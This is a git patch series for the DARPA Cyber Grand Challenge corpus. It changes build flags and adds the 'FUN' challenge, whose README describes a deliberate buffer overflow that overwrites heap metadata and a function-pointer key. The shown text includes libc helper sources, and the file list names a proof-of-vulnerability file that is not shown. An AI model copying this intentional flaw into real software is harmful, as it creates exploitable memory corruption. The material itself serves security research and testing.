From 8ed7176edd2fc79d0a62c5b82e3b7622fd2d4910 Mon Sep 17 00:00:00 2001 From: dns43 Date: Mon, 14 Oct 2019 01:32:54 -0400 Subject: [PATCH 1/6] disable ninja-build to enable Makefile generation --- build.sh | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/build.sh b/build.sh index e8d5812a0..af75eb12f 100755 --- a/build.sh +++ b/build.sh @@ -35,13 +35,13 @@ case $LINK in esac # Prefer ninja over make, if it is available -if which ninja 2>&1 >/dev/null; then - CMAKE_OPTS="-G Ninja $CMAKE_OPTS" - BUILD_FLAGS= -else +#if which ninja 2>&1 >/dev/null; then +# CMAKE_OPTS="-G Ninja $CMAKE_OPTS" +# BUILD_FLAGS= +#else # BUILD_FLAGS="-- -j$(getconf _NPROCESSORS_ONLN)" BUILD_FLAGS= -fi +#fi cmake $CMAKE_OPTS .. From bad29f0ee92e4d831b85ba8b19572eeb59533e3f Mon Sep 17 00:00:00 2001 From: dns43 Date: Mon, 14 Oct 2019 01:35:31 -0400 Subject: [PATCH 2/6] disable 32-bit mode compilation --- CMakeLists.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 6b8f091f8..3ff1fdab6 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -57,12 +57,12 @@ else(WIN32) -fno-builtin -w -g3 - -m32 + #-m32 ) # Link everything 32-bit (until we have a 64-bit option) - set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -m32") - set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -m32") + set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ")#-m32") + set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} ") #-m32") # Linker options # Dynamic by default From 6af8b5030a93de3cdd16f6dfbe760e61f8f241d7 Mon Sep 17 00:00:00 2001 From: dns43 Date: Mon, 14 Oct 2019 01:50:49 -0400 Subject: [PATCH 3/6] fix compiler flags for most challenges --- challenges/Azurad/CMakeLists.txt | 2 +- challenges/Blubber/CMakeLists.txt | 2 +- challenges/CML/CMakeLists.txt | 2 +- challenges/Charter/CMakeLists.txt | 2 +- challenges/FailAV/CMakeLists.txt | 2 +- challenges/Messaging/CMakeLists.txt | 2 +- challenges/PTaaS/CMakeLists.txt | 2 +- challenges/ValveChecks/CMakeLists.txt | 2 +- exclude/FUN/CMakeLists.txt | 7 + exclude/FUN/README.md | 37 + exclude/FUN/lib/calloc.c | 46 + exclude/FUN/lib/cgc_ctype.h | 16 + exclude/FUN/lib/cgc_malloc.h | 53 + exclude/FUN/lib/cgc_stdarg.h | 15 + exclude/FUN/lib/cgc_stddef.h | 17 + exclude/FUN/lib/cgc_stdint.h | 42 + exclude/FUN/lib/cgc_stdlib.h | 29 + exclude/FUN/lib/cgc_string.h | 24 + exclude/FUN/lib/ctype.c | 143 + exclude/FUN/lib/free.c | 51 + exclude/FUN/lib/malloc.c | 143 + exclude/FUN/lib/malloc_common.c | 127 + exclude/FUN/lib/memchr.c | 39 + exclude/FUN/lib/memcmp.c | 36 + exclude/FUN/lib/memcpy.c | 38 + exclude/FUN/lib/memmove.c | 45 + exclude/FUN/lib/memset.c | 42 + exclude/FUN/lib/printf.c | 261 + exclude/FUN/lib/realloc.c | 55 + exclude/FUN/lib/strcasecmp.c | 39 + exclude/FUN/lib/strcat.c | 32 + exclude/FUN/lib/strchr.c | 43 + exclude/FUN/lib/strcmp.c | 37 + exclude/FUN/lib/strcpy.c | 36 + exclude/FUN/lib/strdup.c | 12 + exclude/FUN/lib/strlen.c | 36 + exclude/FUN/lib/strncasecmp.c | 45 + exclude/FUN/lib/strncmp.c | 41 + exclude/FUN/lib/strncpy.c | 17 + exclude/FUN/lib/strsep.c | 47 + exclude/FUN/lib/strtol.c | 127 + exclude/FUN/poller/for-release/POLL_00001.xml | 33 + exclude/FUN/poller/for-testing/POLL_00001.xml | 11 + exclude/FUN/poller/for-testing/machine.py | 11853 ++++++++++++++++ .../FUN/poller/for-testing/state-graph.yaml | 44 + exclude/FUN/pov_1/pov.c | 2259 +++ exclude/FUN/src/cgc_text.h | 289 + exclude/FUN/src/cgc_words_r.h | 11738 +++++++++++++++ exclude/FUN/src/main.c | 936 ++ exclude/FUN/src/tornado.c | 115 + 50 files changed, 29064 insertions(+), 8 deletions(-) create mode 100644 exclude/FUN/CMakeLists.txt create mode 100644 exclude/FUN/README.md create mode 100644 exclude/FUN/lib/calloc.c create mode 100644 exclude/FUN/lib/cgc_ctype.h create mode 100644 exclude/FUN/lib/cgc_malloc.h create mode 100644 exclude/FUN/lib/cgc_stdarg.h create mode 100644 exclude/FUN/lib/cgc_stddef.h create mode 100644 exclude/FUN/lib/cgc_stdint.h create mode 100644 exclude/FUN/lib/cgc_stdlib.h create mode 100644 exclude/FUN/lib/cgc_string.h create mode 100644 exclude/FUN/lib/ctype.c create mode 100644 exclude/FUN/lib/free.c create mode 100644 exclude/FUN/lib/malloc.c create mode 100644 exclude/FUN/lib/malloc_common.c create mode 100644 exclude/FUN/lib/memchr.c create mode 100644 exclude/FUN/lib/memcmp.c create mode 100755 exclude/FUN/lib/memcpy.c create mode 100644 exclude/FUN/lib/memmove.c create mode 100755 exclude/FUN/lib/memset.c create mode 100644 exclude/FUN/lib/printf.c create mode 100644 exclude/FUN/lib/realloc.c create mode 100644 exclude/FUN/lib/strcasecmp.c create mode 100644 exclude/FUN/lib/strcat.c create mode 100644 exclude/FUN/lib/strchr.c create mode 100644 exclude/FUN/lib/strcmp.c create mode 100644 exclude/FUN/lib/strcpy.c create mode 100644 exclude/FUN/lib/strdup.c create mode 100755 exclude/FUN/lib/strlen.c create mode 100644 exclude/FUN/lib/strncasecmp.c create mode 100644 exclude/FUN/lib/strncmp.c create mode 100644 exclude/FUN/lib/strncpy.c create mode 100644 exclude/FUN/lib/strsep.c create mode 100644 exclude/FUN/lib/strtol.c create mode 100644 exclude/FUN/poller/for-release/POLL_00001.xml create mode 100644 exclude/FUN/poller/for-testing/POLL_00001.xml create mode 100644 exclude/FUN/poller/for-testing/machine.py create mode 100644 exclude/FUN/poller/for-testing/state-graph.yaml create mode 100644 exclude/FUN/pov_1/pov.c create mode 100644 exclude/FUN/src/cgc_text.h create mode 100644 exclude/FUN/src/cgc_words_r.h create mode 100644 exclude/FUN/src/main.c create mode 100644 exclude/FUN/src/tornado.c diff --git a/challenges/Azurad/CMakeLists.txt b/challenges/Azurad/CMakeLists.txt index 3a35022bd..8501ae3b2 100644 --- a/challenges/Azurad/CMakeLists.txt +++ b/challenges/Azurad/CMakeLists.txt @@ -1,6 +1,6 @@ add_compile_options( -fno-exceptions -fno-rtti -DCPLUSPLUS ) set( SERVICE_ID "00119" ) set( AUTHOR_ID "KPRCA" ) -add_compile_options( -Oz -g ) +add_compile_options( -Os -g ) set( VULN_COUNT "1" ) buildCB() diff --git a/challenges/Blubber/CMakeLists.txt b/challenges/Blubber/CMakeLists.txt index 7ead51731..fc2b7db89 100644 --- a/challenges/Blubber/CMakeLists.txt +++ b/challenges/Blubber/CMakeLists.txt @@ -1,6 +1,6 @@ add_compile_options( -fno-exceptions -fno-rtti -DCPLUSPLUS ) set( SERVICE_ID "00111" ) set( AUTHOR_ID "KPRCA" ) -add_compile_options( -O1 -g ) +add_compile_options( -O1 -g -fpermissive -fmsextensions) set( VULN_COUNT "1" ) buildCB() diff --git a/challenges/CML/CMakeLists.txt b/challenges/CML/CMakeLists.txt index 42a9d4cda..008a753e9 100644 --- a/challenges/CML/CMakeLists.txt +++ b/challenges/CML/CMakeLists.txt @@ -1,6 +1,6 @@ add_compile_options( -fno-exceptions -fno-rtti -DCPLUSPLUS ) set( SERVICE_ID "00097" ) set( AUTHOR_ID "KPRCA" ) -add_compile_options( -O3 -g ) +add_compile_options( -O3 -g -fpermissive -fms-extensions ) set( VULN_COUNT "1" ) buildCB() diff --git a/challenges/Charter/CMakeLists.txt b/challenges/Charter/CMakeLists.txt index 3d10e1768..8b10305a5 100644 --- a/challenges/Charter/CMakeLists.txt +++ b/challenges/Charter/CMakeLists.txt @@ -1,7 +1,7 @@ set( POLLS_TESTING_SEED "-710644949" ) set( POLLS_RELEASE_MAX_DEPTH "20" ) set( POLLS_RELEASE_SEED "40" ) -add_compile_options( -O0 -g -mno-sse -fblocks ) +add_compile_options( -O0 -g -mno-sse -fblocks -O3 -msse2) set( SERVICE_ID "00006" ) set( AUTHOR_ID "CROMU" ) set( NO_STRIP "1" ) diff --git a/challenges/FailAV/CMakeLists.txt b/challenges/FailAV/CMakeLists.txt index ed717c236..ead5a656e 100644 --- a/challenges/FailAV/CMakeLists.txt +++ b/challenges/FailAV/CMakeLists.txt @@ -1,7 +1,7 @@ set( VULN_COUNT "1" ) add_compile_options( -fno-exceptions -fno-rtti -DCPLUSPLUS ) set( override LDFLAGS "-nostdlib -static -Ttext=0x90000000" ) -add_compile_options( -Oz -g ) +add_compile_options( -Oz -g -fpermissive -fms-extensions) set( SERVICE_ID "00091" ) set( AUTHOR_ID "KPRCA" ) buildCB() diff --git a/challenges/Messaging/CMakeLists.txt b/challenges/Messaging/CMakeLists.txt index 37af7b29b..cba911252 100644 --- a/challenges/Messaging/CMakeLists.txt +++ b/challenges/Messaging/CMakeLists.txt @@ -1,6 +1,6 @@ add_compile_options( -fno-exceptions -fno-rtti -DCPLUSPLUS ) set( SERVICE_ID "00075" ) set( AUTHOR_ID "KPRCA" ) -add_compile_options( -O3 -g -DDISABLE_HEAP_GUARD ) +add_compile_options( -O3 -g -DDISABLE_HEAP_GUARDi -fpermissive -fms-extensions ) set( VULN_COUNT "1" ) buildCB() diff --git a/challenges/PTaaS/CMakeLists.txt b/challenges/PTaaS/CMakeLists.txt index d1cfaa86b..e4ce2caa7 100644 --- a/challenges/PTaaS/CMakeLists.txt +++ b/challenges/PTaaS/CMakeLists.txt @@ -1,6 +1,6 @@ set( SERVICE_ID "00054" ) set( AUTHOR_ID "NRFIN" ) -add_compile_options( -O0 -g -mno-sse ) +add_compile_options( -O0 -g -mno-sse -msse2 -O3 ) set( VULN_COUNT "1" ) buildCB() buildSO() diff --git a/challenges/ValveChecks/CMakeLists.txt b/challenges/ValveChecks/CMakeLists.txt index 93002d65f..29e766a53 100644 --- a/challenges/ValveChecks/CMakeLists.txt +++ b/challenges/ValveChecks/CMakeLists.txt @@ -1,6 +1,6 @@ set( POLLS_TESTING_SEED "1677617456" ) set( POLLS_RELEASE_SEED "1681795162" ) -add_compile_options( -mno-sse -O0 -g -fcommon ) +add_compile_options( -mno-sse -O0 -g -fcommon -msse2 -O3 ) set( SERVICE_ID "00016" ) set( AUTHOR_ID "NRFIN" ) set( POLLS_RELEASE_COUNT "1000" ) diff --git a/exclude/FUN/CMakeLists.txt b/exclude/FUN/CMakeLists.txt new file mode 100644 index 000000000..17ce3212d --- /dev/null +++ b/exclude/FUN/CMakeLists.txt @@ -0,0 +1,7 @@ +set( POLLS_TESTING_COUNT "1000" ) +set( POLLS_TESTING_SEED "12798375" ) +set( POLLS_RELEASE_SEED "1651425667" ) +add_compile_options( -O3 -g -msse2 ) +set( SERVICE_ID "00044" ) +set( AUTHOR_ID "KPRCA" ) +buildCB() diff --git a/exclude/FUN/README.md b/exclude/FUN/README.md new file mode 100644 index 000000000..156b1d9d3 --- /dev/null +++ b/exclude/FUN/README.md @@ -0,0 +1,37 @@ +# KPRCA-00044 (FUN) + +### DARPA performer group +Kaprica Security (KPRCA) + +## Description: + +This service implements a simple text generator based on a Markov process. The initial states are built using static text from the great essayist Jonathan Swift. Additional states can be introduced by training, during which the service will generate text using the current states and an included dictionary, and if the user approves, the text will be added to the states. + +### Feature List + +As an ultra-secure service, attempts to exploit this service will fail because of its novel function pointer protection (FUNpro). Additionally, the text generation uses an advanced RNG that makes use of the latest in processor technologies (SSE2). + +The available commands are: + + * Reprotect - FUNpro! + * Add word - add a word to the internal dictionary + * Sort words - sort the internal dictionary + * Search words - search through the dictionary for a word or partial word + * Generate text - generates text randomly using the current states + * Training - add new states via a machine learning procedure + +## Vulnerability + +The vulnerability is a buffer overflow of an array of strings in the *.data* section (*words*). The binary fails to check the length of the array when adding new strings to the end of the array (*main.c:421*). By overflowing the array, the attack is able to overwrite data used by *malloc* and eventually the *secret_key* which is used to unobfuscate function pointers. + +### Generic class of vulnerability +Buffer overflow + +### CWE classification +CWE-788: Access of Memory Location After End of Buffer + +## Challenges + +This challenge set implements a service with a minimum of direct function calls. Instead, almost all of the function calls from *main.c* are indirect calls through an array of obfuscated function pointers. These function pointers are obfuscated at compile time by adding a constant value to the pointers, and can be reobfuscated at run-time by the user. This will pose a challenge from static analysis of the challenge binary. + +Additionally, in order to trigger the buffer overflow the attack must be able to add many valid words to the dictionary. When adding a new word, the service checks that the word does not already exist in the dictionary and that the word partially matches another word in the dictionary. This will post a challenge for trivial fuzzing attempts, but should be easy for symbolic execution. However, if incorrect paths are taken, the solver will need to handle SSE and SSE2 instructions. diff --git a/exclude/FUN/lib/calloc.c b/exclude/FUN/lib/calloc.c new file mode 100644 index 000000000..5f90fdc1c --- /dev/null +++ b/exclude/FUN/lib/calloc.c @@ -0,0 +1,46 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_stdlib.h" +#include "cgc_string.h" + +void *cgc_calloc(cgc_size_t nmemb, cgc_size_t size) +{ + if (nmemb == 0 || size == 0) + return NULL; + + cgc_size_t tot = nmemb * size; + + // Overflow + if (tot / size != nmemb) + return NULL; + + void *ptr = cgc_malloc(tot); + if (ptr == NULL) + return NULL; + + return cgc_memset(ptr, 0, tot); +} diff --git a/exclude/FUN/lib/cgc_ctype.h b/exclude/FUN/lib/cgc_ctype.h new file mode 100644 index 000000000..c0f04001d --- /dev/null +++ b/exclude/FUN/lib/cgc_ctype.h @@ -0,0 +1,16 @@ +#ifndef CTYPE_H_ +#define CTYPE_H_ + +int cgc_isdigit(int c); +int cgc_isascii(int c); +int cgc_isprint(int c); +int cgc_isalnum(int c); +int cgc_isalpha(int c); +int cgc_islower(int c); +int cgc_isupper(int c); +int cgc_isspace(int c); +int cgc_ispunct(int c); +int cgc_tolower(int c); +int cgc_toupper(int c); + +#endif /* !CTYPE_H_ */ diff --git a/exclude/FUN/lib/cgc_malloc.h b/exclude/FUN/lib/cgc_malloc.h new file mode 100644 index 000000000..22353bc71 --- /dev/null +++ b/exclude/FUN/lib/cgc_malloc.h @@ -0,0 +1,53 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#ifndef MALLOC_COMMON_H +#define MALLOC_COMMON_H + +#include "cgc_stdint.h" + +#define NUM_FREE_LISTS 32 +#define HEADER_PADDING 24 +#define NEW_CHUNK_SIZE 262144 +#define ALIGNMENT 8 + +extern struct blk_t *cgc_free_lists[NUM_FREE_LISTS]; +extern cgc_size_t size_class_limits[NUM_FREE_LISTS]; + +struct blk_t { + cgc_size_t size; + unsigned int free; + struct blk_t *fsucc; + struct blk_t *fpred; + struct blk_t *next; + struct blk_t *prev; +}; + +void cgc_coalesce(struct blk_t *); +int cgc_get_size_class(cgc_size_t size); +void cgc_insert_into_flist(struct blk_t *blk); +void cgc_remove_from_flist(struct blk_t *blk); + +#endif /* MALLOC_COMMON_H */ diff --git a/exclude/FUN/lib/cgc_stdarg.h b/exclude/FUN/lib/cgc_stdarg.h new file mode 100644 index 000000000..8f66d4681 --- /dev/null +++ b/exclude/FUN/lib/cgc_stdarg.h @@ -0,0 +1,15 @@ +#ifndef STDARG_H_ +#define STDARG_H_ + +#ifdef WIN +#include +#else +typedef __builtin_va_list __gnuc_va_list; +#define va_start(v,l) __builtin_va_start(v,l) +#define va_end(v) __builtin_va_end(v) +#define va_arg(v,l) __builtin_va_arg(v,l) + +typedef __gnuc_va_list va_list; +#endif + +#endif /* !STDARG_H_ */ diff --git a/exclude/FUN/lib/cgc_stddef.h b/exclude/FUN/lib/cgc_stddef.h new file mode 100644 index 000000000..56c1ea51d --- /dev/null +++ b/exclude/FUN/lib/cgc_stddef.h @@ -0,0 +1,17 @@ +#ifndef STDDEF_H_ +#define STDDEF_H_ + +#define PAGE_SIZE 4096 + +typedef long int ptrdiff_t; + +#ifndef _LIBCGC_H + typedef long unsigned int cgc_size_t; + typedef long int cgc_ssize_t; + + #define NULL 0 +#endif + +#define offsetof(TYPE, MEMBER) __builtin_offsetof (TYPE, MEMBER) + +#endif /* !STDDEF_H_ */ diff --git a/exclude/FUN/lib/cgc_stdint.h b/exclude/FUN/lib/cgc_stdint.h new file mode 100644 index 000000000..56b0258b8 --- /dev/null +++ b/exclude/FUN/lib/cgc_stdint.h @@ -0,0 +1,42 @@ +#ifndef STDINT_H_ +#define STDINT_H_ + +typedef signed char int8_t; +typedef short int int16_t; +typedef int int32_t; +typedef long long int int64_t; + +typedef unsigned char uint8_t; +typedef unsigned short int uint16_t; +typedef unsigned int uint32_t; +typedef unsigned long long int uint64_t; + +typedef int intptr_t; +typedef unsigned int uintptr_t; + +# define __INT64_C(c) c ## LL +# define __UINT64_C(c) c ## ULL +/* Limits of integral types. */ + +/* Minimum of signed integral types. */ +# define INT8_MIN (-128) +# define INT16_MIN (-32767-1) +# define INT32_MIN (-2147483647-1) +# define INT64_MIN (-__INT64_C(9223372036854775807)-1) +# define INT_MIN INT32_MIN + +/* Maximum of signed integral types. */ +# define INT8_MAX (127) +# define INT16_MAX (32767) +# define INT32_MAX (2147483647) +# define INT64_MAX (__INT64_C(9223372036854775807)) +# define INT_MAX INT32_MAX + +/* Maximum of unsigned integral types. */ +# define UINT8_MAX (255) +# define UINT16_MAX (65535) +# define UINT32_MAX (4294967295U) +# define UINT64_MAX (__UINT64_C(18446744073709551615)) +# define UINT_MAX UINT32_MAX + +#endif /* !STDINT_H_ */ diff --git a/exclude/FUN/lib/cgc_stdlib.h b/exclude/FUN/lib/cgc_stdlib.h new file mode 100644 index 000000000..675e789ee --- /dev/null +++ b/exclude/FUN/lib/cgc_stdlib.h @@ -0,0 +1,29 @@ +#ifndef STDLIB_H_ +#define STDLIB_H_ + +#include "libcgc.h" +#include "cgc_stdarg.h" +#include "cgc_stddef.h" + +#define isinf(x) __builtin_isinf(x) +#define isnan(x) __builtin_isnan(x) + +extern int cgc_fdprintf(int fd, const char *fmt, ...); +extern int cgc_sprintf(char *s, const char *fmt, ...); +#define cgc_printf(...) fdprintf(STDOUT, __VA_ARGS__) + +long cgc_strtol(const char *str, char **endptr, int base); +unsigned long strtoul(const char *str, char **endptr, int base); + +extern void *cgc_malloc(cgc_size_t size); +extern void *cgc_calloc(cgc_size_t nmemb, cgc_size_t size); +extern void *cgc_realloc(void *ptr, cgc_size_t size); +extern void cgc_free(void *ptr); +extern cgc_size_t malloc_size(void *ptr); + +static void cgc_exit(int ret) +{ + cgc__terminate(ret); +} + +#endif /* !STDLIB_H_ */ diff --git a/exclude/FUN/lib/cgc_string.h b/exclude/FUN/lib/cgc_string.h new file mode 100644 index 000000000..85f0e7010 --- /dev/null +++ b/exclude/FUN/lib/cgc_string.h @@ -0,0 +1,24 @@ +#ifndef STRING_H_ +#define STRING_H_ + +#include "cgc_stddef.h" + +extern void *cgc_memcpy(void *dest, const void *src, cgc_size_t n); +extern void *cgc_memmove(void *dest, const void *src, cgc_size_t n); +extern void *cgc_memset(void *dest, int c, cgc_size_t n); +extern int memcmp(void *s1, const void *s2, cgc_size_t n); +extern void *memchr(const void *s, int c, cgc_size_t n); + +extern cgc_size_t cgc_strlen(const char *s); +extern char *cgc_strcpy(char *dest, const char *src); +extern char *cgc_strncpy(char *dest, const char *src, cgc_size_t n); +extern char *cgc_strchr(const char *s, int c); +extern char *cgc_strsep(char **stringp, const char *delim); +extern int strcmp(const char *s1, const char *s2); +extern int strncmp(const char *s1, const char *s2, cgc_size_t n); +extern int strcasecmp(const char *s1, const char *s2); +extern int strncasecmp(const char *s1, const char *s2, cgc_size_t n); +extern char *cgc_strcat(char *dest, const char *src); +extern char *cgc_strdup(const char *src); + +#endif /* !STRING_H_ */ diff --git a/exclude/FUN/lib/ctype.c b/exclude/FUN/lib/ctype.c new file mode 100644 index 000000000..abbcdaf79 --- /dev/null +++ b/exclude/FUN/lib/ctype.c @@ -0,0 +1,143 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "cgc_ctype.h" + +#define NUM_ASCII_CHAR 128 +#define ASCII_MASK 0x7F + +// SPACE is first printable +#define SPACE 0x20 + +// DEL is only char after SPACE that is CNTRL +#define DEL 0x7F + +static const unsigned char _punct[NUM_ASCII_CHAR] = { + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, + 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, + 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0 +}; + +static const unsigned char _xdigit[NUM_ASCII_CHAR] = { + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +}; + +int cgc_isalnum(int c) +{ + return cgc_isalpha(c) || cgc_isdigit(c); +} + +int cgc_isalpha(int c) +{ + return cgc_islower(c) || cgc_isupper(c); +} + +int cgc_isascii(int c) +{ + return !(c & ~ASCII_MASK); +} + +int cgc_isblank(int c) +{ + return (c == ' ' || c == '\t'); +} + +int cgc_iscntrl(int c) +{ + return c == DEL || c < SPACE; +} + +int cgc_isdigit(int c) +{ + return (unsigned int ) c - '0' < 10; +} + +int cgc_isgraph(int c) +{ + return c != ' ' && cgc_isprint(c); +} + +int cgc_islower(int c) +{ + return (unsigned int) c - 'a' < 26; +} + +int cgc_isprint(int c) +{ + return c >= SPACE && c != DEL; +} + +int cgc_ispunct(int c) +{ + return _punct[c]; +} + +int cgc_isspace(int c) +{ + return (c > 8 && c < 14) || c == ' '; +} + +int cgc_isupper(int c) +{ + return (unsigned int ) c - 'A' < 26; +} + +int cgc_isxdigit(int c) +{ + return _xdigit[c]; +} + +int cgc_toascii(int c) +{ + return c & ASCII_MASK; +} + +int cgc_tolower(int c) +{ + if (cgc_isupper(c)) + return c | SPACE; + + return c; +} + +int cgc_toupper(int c) +{ + if (cgc_islower(c)) + return c & (~SPACE & ASCII_MASK); + + return c; +} diff --git a/exclude/FUN/lib/free.c b/exclude/FUN/lib/free.c new file mode 100644 index 000000000..bd3f781a7 --- /dev/null +++ b/exclude/FUN/lib/free.c @@ -0,0 +1,51 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + * + */ + +#include "libcgc.h" +#include "cgc_malloc.h" +#include "cgc_stdlib.h" + +static void free_huge(struct blk_t *blk) +{ + cgc_deallocate(blk, blk->size); +} + +void cgc_free(void *ptr) +{ + if (ptr == NULL) + return; + + struct blk_t *blk = (struct blk_t *)((intptr_t)ptr - HEADER_PADDING); + + if (blk->free != 0) + return; + + if (blk->size >= NEW_CHUNK_SIZE) { + free_huge(blk); + } else { + cgc_insert_into_flist(blk); + cgc_coalesce(blk); + } +} diff --git a/exclude/FUN/lib/malloc.c b/exclude/FUN/lib/malloc.c new file mode 100644 index 000000000..edd8cb75e --- /dev/null +++ b/exclude/FUN/lib/malloc.c @@ -0,0 +1,143 @@ +/* + * Author: Garrett Barboza + * + * Copyright (c) 2014 Kaprica Security, Inc. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE 